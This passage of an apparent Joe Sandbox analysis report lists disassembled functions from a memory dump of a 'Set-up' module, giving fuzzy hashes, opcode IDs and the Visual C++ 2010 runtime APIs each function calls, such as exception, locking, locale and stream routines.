                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@Xfunc@tr1@std@@
                                                                                              • String ID: _PMessage$_PSource
                                                                                              • API String ID: 18525139-3961265847
                                                                                              • Opcode ID: 9100e085db86e3d28225f1873350db4e0acb951ae5e6f39c11a9d35ec5abefa1
                                                                                              • Instruction ID: 123161842b4b4e5b648f749cd3b34b7958f1eca983b872e68c0ddd7a0106ae41
                                                                                              • Opcode Fuzzy Hash: 9100e085db86e3d28225f1873350db4e0acb951ae5e6f39c11a9d35ec5abefa1
                                                                                              • Instruction Fuzzy Hash: B311B1B592520DEFCB00EFA9C444AEAB778FF55354F00859AE855A7200F738D345EBA0
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1731F
                                                                                              • _CxxThrowException.MSVCR100(6BC117B8,6BC4C848), ref: 6BC17335
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1734E
                                                                                              • ?_Xfunc@tr1@std@@YAXXZ.MSVCP100 ref: 6BC1737E
                                                                                                • Part of subcall function 6BC2049E: ??0exception@std@@QAE@XZ.MSVCR100 ref: 6BC204A9
                                                                                                • Part of subcall function 6BC2049E: _CxxThrowException.MSVCR100(?,6BC48440), ref: 6BC204BF
                                                                                                • Part of subcall function 6BC2049E: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC48440), ref: 6BC204D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@Xfunc@tr1@std@@
                                                                                              • String ID: _PMessage$_PSource
                                                                                              • API String ID: 18525139-3961265847
                                                                                              • Opcode ID: 74f54d17e52bd57853f6e4adfc99578a822f74598db1fcc57db401be8dcce0b4
                                                                                              • Instruction ID: 9e029408899829dd20409506621d4d2dab29c13ced59ce2e297bac1576c280ff
                                                                                              • Opcode Fuzzy Hash: 74f54d17e52bd57853f6e4adfc99578a822f74598db1fcc57db401be8dcce0b4
                                                                                              • Instruction Fuzzy Hash: 0C11A2B5A24209EFCF00DF95C444A9EBB78FF55314B40859AE811A7250F73CD345EB60
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000), ref: 6BC1ACAE
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C8F0), ref: 6BC1ACC4
                                                                                              • ??0bad_target@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1ACDB
                                                                                              • ?set@event@Concurrency@@QAEXXZ.MSVCR100 ref: 6BC1AD04
                                                                                              • ??0message_not_found@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1AD12
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$??0bad_target@??0exception@std@@??0message_not_found@?set@event@ExceptionThrow
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 2605033615-988830941
                                                                                              • Opcode ID: 4cda72124bca8e6bf0646294d984dca905c9e48d5e73cc4ca8f40870d9eeb8ec
                                                                                              • Instruction ID: c655afd1122a5c2bdb500dc6bed52846319d7a66def6d1b001bb50302dce7aad
                                                                                              • Opcode Fuzzy Hash: 4cda72124bca8e6bf0646294d984dca905c9e48d5e73cc4ca8f40870d9eeb8ec
                                                                                              • Instruction Fuzzy Hash: DA113C31814108EFCB10DF99C449ADAB7B8FB55311B508499E566A6250F739EB48DF60
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1EDD8
                                                                                              • _CxxThrowException.MSVCR100(6BC11790,6BC4CACC), ref: 6BC1EDEE
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6BC12E7C,6BC11790,6BC4CACC), ref: 6BC1EE01
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1EE26
                                                                                              Strings
                                                                                              • Index is inside segment which failed to be allocated, xrefs: 6BC1EDD1
                                                                                              • Index out of segments table range, xrefs: 6BC1EDFA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow
                                                                                              • String ID: Index is inside segment which failed to be allocated$Index out of segments table range
                                                                                              • API String ID: 754070855-2678207525
                                                                                              • Opcode ID: a30712d4f260e5f0f3b0faa7bf2576de7911746a32844231fdd6643d29cb5b48
                                                                                              • Instruction ID: b4de86956c1e07e1c4f534a579f969ee1facd87d5f0d79d4c1cc87a50a88eac3
                                                                                              • Opcode Fuzzy Hash: a30712d4f260e5f0f3b0faa7bf2576de7911746a32844231fdd6643d29cb5b48
                                                                                              • Instruction Fuzzy Hash: 730100B583811DABCB00DF95D485ADE7B78FB15385F404155E505F6600FB78D788DBA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC198E3
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC198F4
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC19913
                                                                                              • _CxxThrowException.MSVCR100 ref: 6BC19929
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1994D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Lock@details@ReentrantScoped_lock@_$??0_??0exception@std@@??1_ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 785021205-988830941
                                                                                              • Opcode ID: d45fcda0c71ed6c7acfda97dc67a1519103a6182e43751c9a6f1117e08c56778
                                                                                              • Instruction ID: 61f820c9cc5a9b491a336902c8d0921cbb3e63f16ec97e271d21e9b79d3bad08
                                                                                              • Opcode Fuzzy Hash: d45fcda0c71ed6c7acfda97dc67a1519103a6182e43751c9a6f1117e08c56778
                                                                                              • Instruction Fuzzy Hash: 1401B135410104DFCB00CFA4C48AEDEBBB4FF99320F50416AE556EB250EB389745DBA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC19967
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC19978
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC19997
                                                                                              • _CxxThrowException.MSVCR100 ref: 6BC199AD
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC199CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Lock@details@ReentrantScoped_lock@_$??0_??0exception@std@@??1_ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 785021205-988830941
                                                                                              • Opcode ID: 4ffc338ca6134af60f0de287a0afcc26f00f05b6f383aad6a62df5afb66a276f
                                                                                              • Instruction ID: fe7cff32e8945c67bd39630e258b996edcb000550edd969b6ee00a23158652bb
                                                                                              • Opcode Fuzzy Hash: 4ffc338ca6134af60f0de287a0afcc26f00f05b6f383aad6a62df5afb66a276f
                                                                                              • Instruction Fuzzy Hash: C801A231410208DFCB14CFA4C486EEEBB74FF55361F504169E566AB150EB389746DBA0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC25B62
                                                                                              • _Getcvt.MSVCP100(00000008,6BC29EC6,?,00000004,6BC29F36,00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?), ref: 6BC25B6C
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ?_Getdays@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?,00000008,6BC29EC6,?,00000004,6BC29F36,00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014), ref: 6BC25B89
                                                                                                • Part of subcall function 6BC1B8D6: _Getdays.MSVCR100 ref: 6BC1B8DC
                                                                                                • Part of subcall function 6BC1B8D6: ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000), ref: 6BC1B8EC
                                                                                                • Part of subcall function 6BC1B8D6: free.MSVCR100 ref: 6BC1B8F2
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC25B8F
                                                                                                • Part of subcall function 6BC2241F: strlen.MSVCR100 ref: 6BC22432
                                                                                                • Part of subcall function 6BC2241F: _Mbrtowc.MSVCP100(00000000,?,00000001,00000020,00000001,?,?,00000000), ref: 6BC22454
                                                                                                • Part of subcall function 6BC2241F: _Mbrtowc.MSVCP100(00000000,?,00000001,00000000,00000000,?,?,00000000), ref: 6BC22499
                                                                                              • ?_Getmonths@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?), ref: 6BC25B9F
                                                                                                • Part of subcall function 6BC1B90F: _Getmonths.MSVCR100 ref: 6BC1B915
                                                                                                • Part of subcall function 6BC1B90F: ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000), ref: 6BC1B925
                                                                                                • Part of subcall function 6BC1B90F: free.MSVCR100 ref: 6BC1B92B
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC25BA5
                                                                                              • _Getdateorder.MSVCP100 ref: 6BC25BB0
                                                                                                • Part of subcall function 6BC3B33D: ___lc_handle_func.MSVCR100 ref: 6BC3B357
                                                                                                • Part of subcall function 6BC3B33D: GetLocaleInfoW.KERNEL32(?,?,?,6BC25863), ref: 6BC3B360
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                               • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                               • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??4?$_D@std@@Locinfo@std@@MaklocstrMbrtowcV01@Yarn@___lc_handle_funcfree$GetcvtGetdateorderGetdaysGetdays@_GetmonthsGetmonths@_H_prolog3_catchInfoLocale___lc_codepage_funcstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2864360128-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC25810
                                                                                              • _Getcvt.MSVCP100(00000008,6BC298D6,?,00000004,6BC29946,00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?), ref: 6BC2581A
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ?_Getdays@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?,00000008,6BC298D6,?,00000004,6BC29946,00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014), ref: 6BC25837
                                                                                                • Part of subcall function 6BC1B8D6: _Getdays.MSVCR100 ref: 6BC1B8DC
                                                                                                • Part of subcall function 6BC1B8D6: ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000), ref: 6BC1B8EC
                                                                                                • Part of subcall function 6BC1B8D6: free.MSVCR100 ref: 6BC1B8F2
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC2583D
                                                                                                • Part of subcall function 6BC23503: strlen.MSVCR100 ref: 6BC2350E
                                                                                              • ?_Getmonths@_Locinfo@std@@QBEPBDXZ.MSVCP100(00000000,?), ref: 6BC2584D
                                                                                                • Part of subcall function 6BC1B90F: _Getmonths.MSVCR100 ref: 6BC1B915
                                                                                                • Part of subcall function 6BC1B90F: ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000), ref: 6BC1B925
                                                                                                • Part of subcall function 6BC1B90F: free.MSVCR100 ref: 6BC1B92B
                                                                                              • _Maklocstr.LIBCPMT ref: 6BC25853
                                                                                              • _Getdateorder.MSVCP100 ref: 6BC2585E
                                                                                                • Part of subcall function 6BC3B33D: ___lc_handle_func.MSVCR100 ref: 6BC3B357
                                                                                                • Part of subcall function 6BC3B33D: GetLocaleInfoW.KERNEL32(?,?,?,6BC25863), ref: 6BC3B360
                                                                                              Similarity
                                                                                              • API ID: ??4?$_D@std@@Locinfo@std@@MaklocstrV01@Yarn@___lc_handle_funcfree$GetcvtGetdateorderGetdaysGetdays@_GetmonthsGetmonths@_H_prolog3_catchInfoLocale___lc_codepage_funcstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1792450307-0
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC358AE
                                                                                              • ?_Getffldx@?$num_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHPADAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@1AAVios_base@2@PAH@Z.MSVCP100(?,?,?,00000000,?,?,00000060,6BC385E1,?,?,?,?,?,00000000,00000000), ref: 6BC358E0
                                                                                                • Part of subcall function 6BC31DF6: __EH_prolog3_GS.LIBCMT ref: 6BC31DFD
                                                                                                • Part of subcall function 6BC31DF6: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,0000006C,6BC358E5,?,?,?,00000000,?,?,00000060,6BC385E1,?,?,?,?,?), ref: 6BC31E1E
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000060,6BC385E1,?,?,?,?,?,00000000,00000000), ref: 6BC358F1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@H_prolog3_U?$char_traits@V?$istreambuf_iterator@Vlocale@2@$D@std@@@2@1D@std@@@std@@@std@@Getffldx@?$num_get@Vios_base@2@
                                                                                              • String ID: $
                                                                                              • API String ID: 3550892291-3993045852
                                                                                              APIs
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,C18D2153), ref: 6BC192DF
                                                                                              • ??0_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?), ref: 6BC19324
                                                                                              • ??1_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19338
                                                                                              • ??0_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?), ref: 6BC193A1
                                                                                              • ??1_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC193C6
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19403
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Lock@details@ReentrantScoped_lock@_$??0_??1_V123@@
                                                                                              • String ID:
                                                                                              • API String ID: 1298863651-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2DC0D
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2DC35
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2DC5D
                                                                                              • ?sbumpc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2DC8C
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2DCCD
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,00000001,?,00000014), ref: 6BC2DD01
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?sgetc@?$basic_streambuf@_H_prolog3_catch$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?sbumpc@?$basic_streambuf@_?setstate@?$basic_ios@_?snextc@?$basic_streambuf@_Ipfx@?$basic_istream@_V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 585914602-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2C38B
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2C3B3
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000001,?,00000014), ref: 6BC2C3DB
                                                                                              • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000001,?,00000014), ref: 6BC2C401
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2C43F
                                                                                              • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(?,?,00000001,?,00000014), ref: 6BC2C471
                                                                                              Similarity
                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?sgetc@?$basic_streambuf@H_prolog3_catchU?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@?flush@?$basic_ostream@_?getloc@ios_base@std@@?sbumpc@?$basic_streambuf@?setstate@?$basic_ios@_?snextc@?$basic_streambuf@Ipfx@?$basic_istream@V12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 3486570414-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: String__crt$___lc_handle_func_malloc_crtfreememcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1881293509-0
                                                                                              APIs
                                                                                              • ??0_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,C18D2153,?), ref: 6BC18CBD
                                                                                              • ??1_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC18CD4
                                                                                              • ??0_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?), ref: 6BC18CF1
                                                                                              • ??1_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC18D04
                                                                                              • ??1_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC18D30
                                                                                              • ?_Xfunc@tr1@std@@YAXXZ.MSVCP100 ref: 6BC18D44
                                                                                                • Part of subcall function 6BC2049E: ??0exception@std@@QAE@XZ.MSVCR100 ref: 6BC204A9
                                                                                                • Part of subcall function 6BC2049E: _CxxThrowException.MSVCR100(?,6BC48440), ref: 6BC204BF
                                                                                                • Part of subcall function 6BC2049E: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC48440), ref: 6BC204D5
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Lock@details@ReentrantScoped_lock@_$??1_$??0_??0exception@std@@V123@@$ExceptionThrowV01@@Xfunc@tr1@std@@
                                                                                              • String ID:
                                                                                              • API String ID: 2011713233-0
                                                                                              APIs
                                                                                              • ?_Tidy@ios_base@std@@AAEXXZ.MSVCP100(?,?,?,?,6BC1CD61,?), ref: 6BC1D0DD
                                                                                                • Part of subcall function 6BC1D35A: std::ios_base::_Callfns.LIBCPMT(00000000,?,?,?,6BC1D0E2,?,?,?,?,6BC1CD61,?), ref: 6BC1D363
                                                                                                • Part of subcall function 6BC1D35A: ??3@YAXPAX@Z.MSVCR100(?,00000000,?,?,?,6BC1D0E2,?,?,?,?,6BC1CD61,?), ref: 6BC1D378
                                                                                                • Part of subcall function 6BC1D35A: ??3@YAXPAX@Z.MSVCR100(?,00000000,?,?,?,6BC1D0E2,?,?,?,?,6BC1CD61,?), ref: 6BC1D38F
                                                                                                • Part of subcall function 6BC1BBC4: std::locale::facet::_Decref.LIBCPMT(?,?,?,6BC1D0ED,?,?,?,?,?,6BC1CD61,?), ref: 6BC1BBD6
                                                                                                • Part of subcall function 6BC1BBC4: std::locale::facet::_Incref.LIBCPMT(?,?,?,6BC1D0ED,?,?,?,?,?,6BC1CD61,?), ref: 6BC1BBEB
                                                                                              • ?_Findarr@ios_base@std@@AAEAAU_Iosarray@12@H@Z.MSVCP100(?,?,?,?,?,?,?,?,6BC1CD61,?), ref: 6BC1D125
                                                                                              • ?_Findarr@ios_base@std@@AAEAAU_Iosarray@12@H@Z.MSVCP100(?,?,?,?,?,?,?,?,?,6BC1CD61,?), ref: 6BC1D135
                                                                                              • ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z.MSVCP100(00000000,?,?,?,?,?,?,?,?,?,?,6BC1CD61,?), ref: 6BC1D151
                                                                                                • Part of subcall function 6BC1D091: ??2@YAPAXI@Z.MSVCR100(0000000C,?,?,6BC1D156,00000000,?,?,?,?,?,?,?,?,?,?,6BC1CD61), ref: 6BC1D09B
                                                                                              • std::ios_base::_Callfns.LIBCPMT(00000002,00000000,?,?,?,?,?,?,?,?,?,?,6BC1CD61,?), ref: 6BC1D160
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,?,00000002,00000000,?,?,?,?,?,?,?,?,?,?,6BC1CD61,?), ref: 6BC1D174
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@CallfnsFindarr@ios_base@std@@Iosarray@12@std::ios_base::_std::locale::facet::_$??2@?clear@ios_base@std@@?register_callback@ios_base@std@@DecrefIncrefTidy@ios_base@std@@V12@W4event@12@
                                                                                              • String ID:
                                                                                              • API String ID: 3859176867-0
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2DAEE
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000001,?,00000014), ref: 6BC2DB14
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000001,?,00000014), ref: 6BC2DB30
                                                                                              • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,00000001,?,00000014), ref: 6BC2DB55
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,00000001,?,00000014), ref: 6BC2DB79
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000001,?,00000014), ref: 6BC2DBA7
                                                                                              Memory Dump Source
